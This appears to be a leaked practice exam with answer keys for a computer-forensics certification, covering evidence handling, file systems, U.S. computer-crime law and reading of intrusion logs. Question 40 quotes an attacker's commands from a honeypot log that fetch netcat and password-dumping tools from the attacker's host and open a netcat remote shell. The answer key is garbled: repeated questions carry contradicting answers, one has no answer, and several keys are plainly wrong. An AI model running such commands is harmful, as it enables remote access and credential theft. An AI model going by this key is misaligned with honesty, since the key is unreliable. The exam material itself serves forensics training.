QUESTION 1
When an investigator contacts by telephone the domain administrator or controller listed by a
whois lookup to request all e-mails sent and received for a user account be preserved, what
U.S.C. statute authorizes this phone call and obligates the ISP to preserve e-mail records?
A. Title 18, Section 1030
B. Title 18, Section 2703(d)
C. Title 18, Section Chapter 90
D. Title 18, Section 2703(f)
Answer: D
QUESTION 2
If you come across a sheepdip machine at your client site, what would you infer?
A. A sheepdip coordinates several honeypots
B. A sheepdip computer is another name for a honeypot
C. A sheepdip computer is used only for virus-checking.
D. A sheepdip computer defers a denial of service attack
Answer: C
QUESTION 3
In a computer forensics investigation, what describes the route that evidence takes from the time
you find it until the case is closed or goes to court?
A. rules of evidence
B. law of probability
C. chain of custody
D. policy of separation
Answer: C
QUESTION 4
How many characters long is the fixed-length MD5 algorithm checksum of a critical system file?
A. 128
B. 64
C. 32
D. 16
Answer: C
QUESTION 5
To calculate the number of bytes on a disk, the formula is: CHS
A. number of circles x number of halves x number of sides x 512 bytes per sector
B. number of cylinders x number of halves x number of shims x 512 bytes per sector
C. number of cells x number of heads x number of sides x 512 bytes per sector
D. number of cylinders x number of halves x number of shims x 512 bytes per sector
Answer:
QUESTION 6
What does the superblock in Linux define?
A. file system names
B. available space
C. location of the first inode
D. disk geometry
Answer: B, C, D
QUESTION 7
A honeypot deployed with the IP 172.16.1.108 was compromised by an attacker. Given below is
an excerpt from a Snort binary capture of the attack. Decipher the activity carried out by the
attacker by studying the log. Please note that you are required to infer only what is explicit in the
excerpt. (Note: The student is being tested on concepts learnt during passive OS fingerprinting,
basic TCP/IP connection concepts and the ability to read packet signatures from a sniff dump.)
03/15-20:21:24.107053 211.185.125.124:3500 -> 172.16.1.108:111
TCP TTL:43 TOS:0x0 ID:29726 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x9B6338C5 Ack: 0x5820ADD0 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 23678634 2878772
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
03/15-20:21:24.452051 211.185.125.124:789 -> 172.16.1.103:111
UDP TTL:43 TOS:0x0 ID:29733 IpLen:20 DgmLen:84
Len: 64
01 0A 8A 0A 00 00 00 00 00 00 00 02 00 01 86 A0 ................
00 00 00 02 00 00 00 03 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 01 86 B8 00 00 00 01 ................
00 00 00 11 00 00 00 00 ........
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
03/15-20:21:24.730436 211.185.125.124:790 -> 172.16.1.103:32773
UDP TTL:43 TOS:0x0 ID:29781 IpLen:20 DgmLen:1104
Len: 1084
47 F7 9F 63 00 00 00 00 00 00 00 02 00 01 86 B8 G..c............
00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20 ...............
3A B1 5E E5 00 00 00 09 6C 6F 63 61 6C 68 6F 73 :.^.....localhost
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
03/15-20:21:36.539731 211.185.125.124:4450 -> 172.16.1.108:39168
TCP TTL:43 TOS:0x0 ID:31660 IpLen:20 DgmLen:71 DF
***AP*** Seq: 0x9C6D2BFF Ack: 0x59606333 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 23679878 2880015
63 64 20 2F 3B 20 75 6E 61 6D 65 20 2D 61 3B 20 cd /; uname -a;
69 64 3B id;
A. The attacker has conducted a network sweep on port 111
B. The attacker has scanned and exploited the system using Buffer Overflow
C. The attacker has used a Trojan on port 32773
D. The attacker has installed a backdoor
Answer: A
QUESTION 8
The newer Macintosh Operating System is based on:
A. OS/2
B. BSD Unix
C. Linux
D. Microsoft Windows
Answer: B
QUESTION 9
Before you are called to testify as an expert, what must an attorney do first?
A. engage in damage control
B. prove that the tools you used to conduct your examination are perfect
C. read your curriculum vitae to the jury
D. qualify you as an expert witness
Answer: D
QUESTION 10
You are contracted to work as a computer forensics investigator for a regional bank that has four
30 TB storage area networks that store customer data. What method would be most efficient for
you to acquire digital evidence from this network?
A. create a compressed copy of the file with DoubleSpace
B. create a sparse data copy of a folder or file
C. make a bit-stream disk-to-image file
D. make a bit-stream disk-to-disk file
Answer: C
QUESTION 11
You are working for a large clothing manufacturer as a computer forensics investigator and are
called in to investigate an unusual case of an employee possibly stealing clothing designs from
the company and selling them under a different brand name for a different company. What you
discover during the course of the investigation is that the clothing designs are actually original
products of the employee and the company has no policy against an employee selling his own
designs on his own time. The only thing that you can find that the employee is doing wrong is that
his clothing design incorporates the same graphic symbol as that of the company with only the
wording in the graphic being different. What area of the law is the employee violating?
A. trademark law
B. copyright law
C. printright law
D. brandmark law
Answer: A
QUESTION 12
What file structure database would you expect to find on floppy disks?
A. NTFS
B. FAT32
C. FAT16
D. FAT12
Answer: D
QUESTION 13
What type of attack occurs when an attacker can force a router to stop forwarding packets by
flooding the router with many open connections simultaneously so that all the hosts behind the
router are effectively disabled?
A. digital attack
B. denial of service
C. physical attack
D. ARP redirect
Answer: B
QUESTION 14
When examining a file with a Hex Editor, what space does the file header occupy?
A. the last several bytes of the file
B. the first several bytes of the file
C. none, file headers are contained in the FAT
D. one byte at the beginning of the file
Answer: D
QUESTION 15
In the context of the file deletion process, which of the following statements holds true?
A. When files are deleted, the data is overwritten and the cluster marked as available
B. The longer a disk is in use, the less likely it is that deleted files will be overwritten
C. While booting, the machine may create temporary files that can delete evidence
D. Secure delete programs work by completely overwriting the file in one go
Answer: C
QUESTION 16
A suspect is accused of violating the acceptable use of computing resources, as he has visited
adult websites and downloaded images. The investigator wants to demonstrate that the suspect
did indeed visit these sites. However, the suspect has cleared the search history and emptied the
cookie cache. Moreover, he has removed any images he might have downloaded. What can the
investigator do to prove the violation? Choose the most feasible option.
A. Image the disk and try to recover deleted files
B. Seek the help of co-workers who are eye-witnesses
C. Check the Windows registry for connection data (You may or may not recover)
D. Approach the websites for evidence
Answer: A
QUESTION 17
A(n) _____________________ is one that's performed by a computer program rather than the
attacker manually performing the steps in the attack sequence.
A. blackout attack
B. automated attack
C. distributed attack
D. central processing attack
Answer: B
QUESTION 18
The offset in a hexadecimal code is:
A. The last byte after the colon
B. The 0x at the beginning of the code
C. The 0x at the end of the code
D. The first byte after the colon
Answer: B
QUESTION 19
It takes _____________ mismanaged case/s to ruin your professional reputation as a computer
forensics examiner?
A. by law, three
B. quite a few
C. only one
D. at least two
Answer: C
QUESTION 20
With the standard Linux second extended file system (Ext2fs), a file is deleted when the inode
internal link count reaches ________.
A. 0
B. 10
C. 100
D. 1
Answer: A
QUESTION 21
When examining the log files from a Windows IIS Web Server, how often is a new log file
created?
A. the same log is used at all times
B. a new log file is created everyday
C. a new log file is created each week
D. a new log is created each time the Web Server is started
Answer: A
QUESTION 22
Which part of the Windows Registry contains the user's password file?
A. HKEY_LOCAL_MACHINE
B. HKEY_CURRENT_CONFIGURATION
C. HKEY_USER
D. HKEY_CURRENT_USER
Answer: A
QUESTION 23
An employee is attempting to wipe out data stored on a couple of compact discs (CDs) and digital
video discs (DVDs) by using a large magnet. You inform him that this method will not be effective
in wiping out the data because CDs and DVDs are ______________ media used to store large
amounts of data and are not affected by the magnet.
A. logical
B. anti-magnetic
C. magnetic
D. optical
Answer: D
QUESTION 24
Lance wants to place a honeypot on his network. Which of the following would be your
recommendations?
A. Use a system that has a dynamic addressing on the network
B. Use a system that is not directly interacting with the router
C. Use it on a system in an external DMZ in front of the firewall
D. It doesn't matter as all replies are faked
Answer: D
QUESTION 25
What does the acronym POST mean as it relates to a PC?
A. Primary Operations Short Test
B. Power On Self Test
C. Pre Operational Situation Test
D. Primary Operating System Test
Answer: B
QUESTION 26
Which legal document allows law enforcement to search an office, place of business, or other
locale for evidence relating to an alleged crime?
A. bench warrant
B. wire tap
C. subpoena
D. search warrant
Answer: D
QUESTION 27
You are working as an investigator for a corporation and you have just received instructions from
your manager to assist in the collection of 15 hard drives that are part of an ongoing investigation.
Your job is to complete the required evidence custody forms to properly document each piece of
evidence as it is collected by other members of your team. Your manager instructs you to
complete one multi-evidence form for the entire case and a single-evidence form for each hard
drive. How will these forms be stored to help preserve the chain of custody of the case?
A. All forms should be placed in an approved secure container because they are now
primary evidence in the case.
B. The multi-evidence form should be placed in the report file and the single-evidence
forms should be kept with each hard drive in an approved secure container.
C. The multi-evidence form should be placed in an approved secure container with the
hard drives and the single-evidence forms should be placed in the report file.
D. All forms should be placed in the report file because they are now primary evidence
in the case.
Answer: B
QUESTION 28
The MD5 program is used to:
A. wipe magnetic media before recycling it
B. make directories on an evidence disk
C. view graphics files on an evidence drive
D. verify that a disk is not altered when you examine it
Answer: D
QUESTION 29
Which is a standard procedure to perform during all computer forensics investigations?
A. with the hard drive removed from the suspect PC, check the date and time in the system's
CMOS
B. with the hard drive in the suspect PC, check the date and time in the File Allocation Table
C. with the hard drive removed from the suspect PC, check the date and time in the system's
RAM
D. with the hard drive in the suspect PC, check the date and time in the system's CMOS
Answer: A
QUESTION 30
E-mail logs contain which of the following information to help you in your investigation?
(Select up to 4)
A. user account that was used to send the account
B. attachments sent with the e-mail message
C. unique message identifier
D. contents of the e-mail message
E. date and time the message was sent
Answer: A, C, D, E
QUESTION 31
In a forensic examination of hard drives for digital evidence, what type of user is most likely to
have the most file slack to analyze?
A. one who has NTFS 4 or 5 partitions
B. one who uses dynamic swap file capability
C. one who uses hard disk writes on IRQ 13 and 21
D. one who has lots of allocation units per block or cluster
Answer: D
QUESTION 32
In what way do the procedures for dealing with evidence in a criminal case differ from the
procedures for dealing with evidence in a civil case?
A. evidence must be handled in the same way regardless of the type of case
B. evidence procedures are not important unless you work for a law enforcement agency
C. evidence in a criminal case must be secured more tightly than in a civil case
D. evidence in a civil case must be secured more tightly than in a criminal case
Answer: C
QUESTION 33
You are assigned to work in the computer forensics lab of a state police agency. While working
on a high profile criminal case, you have followed every applicable procedure; however, your boss
is still concerned that the defense attorney might question whether evidence has been changed
while at the lab. What can you do to prove that the evidence is the same as it was when it first
entered the lab?
A. make an MD5 hash of the evidence and compare it with the original MD5 hash that was taken
when the evidence first entered the lab
B. make an MD5 hash of the evidence and compare it to the standard database developed by
NIST
C. there is no reason to worry about this possible claim because state labs are certified
D. sign a statement attesting that the evidence is the same as it was when it entered the lab
Answer: A
QUESTION 34
Study the log given below and answer the following question:
Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169
Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482
Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53
Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21
Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53
Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111
Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80
Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53
Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0)
Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by
simple(uid=506)
Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080
Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558
Precautionary measures to prevent this attack would include writing firewall rules. Of these
firewall rules, which among the following would be appropriate?
A. Disallow UDP 53 in from outside to DNS server
B. Allow UDP 53 in from DNS server to outside
C. Disallow TCP 53 in from secondaries or ISP server to DNS server
D. Block all UDP traffic
Answer: A
QUESTION 35
When monitoring for both intrusion and security events between multiple computers, it is essential
that the computers' clocks are synchronized. Synchronized time allows an administrator to
reconstruct what took place during an attack against multiple computers. Without synchronized
time, it is very difficult to determine exactly when specific events took place, and how events
interlace. What is the name of the service used to synchronize time among multiple computers?
A. Universal Time Set
B. Network Time Protocol
C. SyncTime Service
D. Time-Sync Protocol
Answer: B
QUESTION 36
When investigating a potential e-mail crime, what is your first step in the investigation?
A. Trace the IP address to its origin
B. Write a report
C. Determine whether a crime was actually committed
D. Recover the evidence
Answer: A
QUESTION 37
If you discover a criminal act while investigating a corporate policy abuse, it becomes a public-sector
investigation and should be referred to law enforcement?
A. True
B. False
Answer: B
QUESTION 38
The following excerpt is taken from a honeypot log. The log captures activities across three days.
There are several intrusion attempts; however, a few are successful.
(Note: The objective of this question is to test whether the student can read basic information
from log entries and interpret the nature of attack.)
Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169
Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482
Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53
Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21
Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53
Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111
Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80
Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53
Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0)
Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by
simple(uid=506)
Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080
Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558
From the options given below choose the one which best interprets the following entry:
Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
A. An IDS evasion technique
B. A buffer overflow attempt
C. A DNS zone transfer
D. Data being retrieved from 63.226.81.13
Answer: A
QUESTION 39
What happens when a file is deleted by a Microsoft operating system using the FAT file system?
A. only the reference to the file is removed from the FAT
B. the file is erased and cannot be recovered
C. a copy of the file is stored and the original file is erased
D. the file is erased but can be recovered
Answer: A
QUESTION 40
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort
reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization
vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally
have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in
displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability
allows a malicious user to construct SQL statements that will execute shell commands (such as
CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a
query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which
results in the commands run as shown below.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
What can you infer from the exploit given?
A. It is a local exploit where the attacker logs in using username johna2k
B. There are two attackers on the system - johna2k and haxedj00
C. The attack is a remote exploit and the hacker downloads three files
D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port
Answer: A
QUESTION 41
What term is used to describe a cryptographic technique for embedding information into
something else for the sole purpose of hiding that information from the casual observer?
A. rootkit
B. key escrow
C. steganography
D. Offset
Answer: C
QUESTION 42
During the course of an investigation, you locate evidence that may prove the innocence of the
suspect of the investigation. You must maintain an unbiased opinion and be objective in your
entire fact finding process. Therefore you report this evidence. This type of evidence is known as:
A. Inculpatory evidence
B. mandatory evidence
C. exculpatory evidence
D. Terrible evidence
Answer: C
QUESTION 43
Corporate investigations are typically easier than public investigations because:
A. the investigator has to get a warrant
B. the users have standard corporate equipment and software
C. the investigator does not have to get a warrant
D. the users can load whatever they want on their machines
Answer: B
QUESTION 44
What binary coding is used most often for e-mail purposes?
A. MIME
B. Uuencode
C. IMAP
D. SMTP
Answer: A
QUESTION 45
If you see the files Zer0.tar.gz and copy.tar.gz on a Linux system while doing an investigation,
what can you conclude?
A. The system files have been copied by a remote attacker
B. The system administrator has created an incremental backup
C. The system has been compromised using a t0rn rootkit
D. Nothing in particular as these can be operational files
Answer: D
QUESTION 46
From the following spam mail header, identify the host IP that sent this spam?
From jie02@netvigator.com jie02@netvigator.com Tue Nov 27 17:27:11 2001
Received: from viruswall.ie.cuhk.edu.hk (viruswall [137.189.96.52]) by eng.ie.cuhk.edu.hk (8.11.6/8.11.6) with ESMTP id fAR9RAP23061 for ; Tue, 27 Nov 2001 17:27:10 +0800 (HKT)
Received: from mydomain.com (pcd249020.netvigator.com [203.218.39.20]) by viruswall.ie.cuhk.edu.hk (8.12.1/8.12.1) with SMTP id fAR9QXwZ018431 for ; Tue, 27 Nov 2001 17:26:36 +0800 (HKT)
Message-Id: >200111270926.fAR9QXwZ018431@viruswall.ie.cuhk.edu.hk
From: "china hotel web"
To: "Shlam"
Subject: SHANGHAI (HILTON HOTEL) PACKAGE
Date: Tue, 27 Nov 2001 17:25:58 +0800
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
Reply-To: "china hotel web"
A. 137.189.96.52
B. 8.12.1.0
C. 203.218.39.20
D. 203.218.39.50
Answer: C
QUESTION 47
If you plan to startup a suspect's computer, you must modify the ___________ to ensure that you
do not contaminate or alter data on the suspect's hard drive by booting to the hard drive.
A. deltree command
B. CMOS
C. Boot.sys
D. Scandisk utility
Answer: C
QUESTION 48
You are working for a local police department that services a population of 1,000,000 people and
you have been given the task of building a computer forensics lab. How many law-enforcement
computer investigators should you request to staff the lab?
A. 8
B. 1
C. 4
D. 2
Answer: C
QUESTION 49
When obtaining a warrant it is important to:
A. particularly describe the place to be searched and particularly describe the items to be seized
B. generally describe the place to be searched and particularly describe the items to be seized
C. generally describe the place to be searched and generally describe the items to be seized
D. particularly describe the place to be searched and generally describe the items to be seized
Answer: A
QUESTION 50
If a suspect computer is located in an area that may have toxic chemicals, you must:
A. assume the suspect machine is contaminated
B. coordinate with the HAZMAT team
C. do not enter alone
D. determine a way to obtain the suspect computer
Answer: B
QUESTION 51
Diskcopy is:
A. a utility by AccessData
B. a standard MS-DOS command
C. Digital Intelligence utility
D. dd copying tool
Answer: C
QUESTION 52
Sectors in hard disks typically contain how many bytes?
A. 256
B. 512
C. 1024
D. 2048
Answer: B
QUESTION 53
Area density refers to:
A. the amount of data per disk
B. the amount of data per partition
C. the amount of data per square inch
D. the amount of data per platter
Answer: A
QUESTION 54
When an investigator contacts by telephone the domain administrator or controller listed by a
whois lookup to request all e-mails sent and received for a user account be preserved, what
U.S.C. statute authorizes this phone call and obligates the ISP to preserve e-mail records?
A. Title 18, Section 1030
B. Title 18, Section Chapter 90
C. Title 18, Section 2703(d)
D. Title 18, Section 2703(f)
Answer: C
QUESTION 55
How many characters long is the fixed-length MD5 algorithm checksum of a critical system file?
A. 16
B. 32
C. 64
D. 128
Answer: B
QUESTION 56
Jason is the security administrator of ACMA metal Corporation. One day he notices the
company's Oracle database server has been compromised and the customer information along
with financial data has been stolen. The financial loss will be in millions of dollars if the database
gets into the hands of the competitors. Jason wants to report this crime to the law enforcement
agencies immediately. Which organization coordinates computer crimes investigations throughout
the United States?
A. Internet Fraud Complaint Center
B. Local or national office of the U.S. Secret Service
C. National Infrastructure Protection Center
D. CERT Coordination Center
Answer: B
QUESTION 57
Which Intrusion Detection System (IDS) usually produces the most false alarms due to the
unpredictable behaviors of users and networks?
A. network-based IDS systems (NIDS)
B. host-based IDS systems (HIDS)
C. anomaly detection
D. signature recognition
Answer: B
QUESTION 58
In a forensic examination of hard drives for digital evidence, what type of user is most likely to
have the most file slack to analyze?
A. one who has lots of allocation units per block or cluster
B. one who has NTFS 4 or 5 partitions
C. one who uses dynamic swap file capability
D. one who uses hard disk writes on IRQ 13 and 21
Answer: A
QUESTION 59
Which part of the Windows Registry contains the user's password file?
A. HKEY_CURRENT_USER
B. HKEY_USER
C. HKEY_LOCAL_MACHINE
D. HKEY_CURRENT_CONFIGURATION
Answer: C
QUESTION 60
What header field in the TCP/IP protocol stack involves the hacker exploit known as the Ping of
Death?
A. ICMP header field
B. TCP header field
C. IP header field
D. UDP header field
Answer: B
QUESTION 61
What method of computer forensics will allow you to trace all ever-established user accounts on a
Windows 2000 server over the course of its lifetime?
A. forensic duplication of hard drive
B. analysis of volatile data
C. comparison of MD5 checksums
D. review of SIDs in the Registry
Answer: C
QUESTION 62
Which response organization tracks hoaxes as well as viruses?
A. NIPC
B. FEDCIRC
C. CERT
D. CIAC
Answer: D
QUESTION 63
Which federal computer crime law specifically refers to fraud and related activity in connection
with access devices like routers?
A. 18 U.S.C. 1029
B. 18 U.S.C. 1362
C. 18 U.S.C. 2511
D. 18 U.S.C. 2703
Answer: A
QUESTION 64
Office documents (Word, Excel, and PowerPoint) contain a code that allows tracking the MAC, or
unique identifier, of the machine that created the document. What is that code called?
A. the Microsoft Virtual Machine Identifier
B. the Personal Application Protocol
C. the Globally Unique ID
D. the Individual ASCII String
Answer: C
QUESTION 65
What TCP/UDP port does the toolkit program netstat use?
A. Port 7
B. Port 15
C. Port 23
D. Port 69
Answer: B
QUESTION 66
Under which Federal Statutes does FBI investigate for computer crimes involving e-mail scams
and mail fraud?
A. 18 U.S.C. 1029 Possession of Access Devices
B. 18 U.S.C. 1030 Fraud and related activity in connection with computers
C. 18 U.S.C. 1343 Fraud by wire, radio or television
D. 18 U.S.C. 1361 Injury to Government Property
E. 18 U.S.C. 1362 Government communication systems
F. 18 U.S.C. 1831 Economic Espionage Act
G. 18 U.S.C. 1832 Trade Secrets Act
Answer: B
QUESTION 67
In a FAT32 system, a 123 KB file will use how many sectors?
A. 34
B. 25
C. 11
D. 56
Answer: B
QUESTION 68
What does the superblock in Linux define?
A. file system names
B. disk geometry
C. location of the first inode
D. available space
Answer: C
QUESTION 69
Why should you note all cable connections for a computer you want to seize as evidence?
A. to know what outside connections existed
B. in case other devices were connected
C. to know what peripheral devices exist
D. to know what hardware existed
Answer: A
QUESTION 70
You should make at least how many bit-stream copies of a suspect drive?
A. 1
B. 2
C. 3
D. 4
Answer: B
QUESTION 71
Which of the following should a computer forensics lab used for investigations have?
A. isolation
B. restricted access
C. open access
D. an entry log
Answer: B
QUESTION 72
Corporate investigations are typically easier than public investigations because:
A. the users have standard corporate equipment and software
B. the investigator does not have to get a warrant
C. the investigator has to get a warrant
D. the users can load whatever they want on their machines
Answer: B
QUESTION 73
If you discover a criminal act while investigating a corporate policy abuse, it becomes a public-sector
investigation and should be referred to law enforcement?
A. true
B. false
Answer: A
QUESTION 74
If a suspect computer is located in an area that may have toxic chemicals, you must:
A. coordinate with the HAZMAT team
B. determine a way to obtain the suspect computer
C. assume the suspect machine is contaminated
D. do not enter alone
Answer: A
QUESTION 75
You are using DriveSpy, a forensic tool, and want to copy 150 sectors where the starting sector is
1709 on the primary hard drive. Which of the following formats correctly specifies these sectors?
A. 0:1000, 150
B. 0:1709, 150
C. 1:1709, 150
D. 0:1709-1858
Answer: B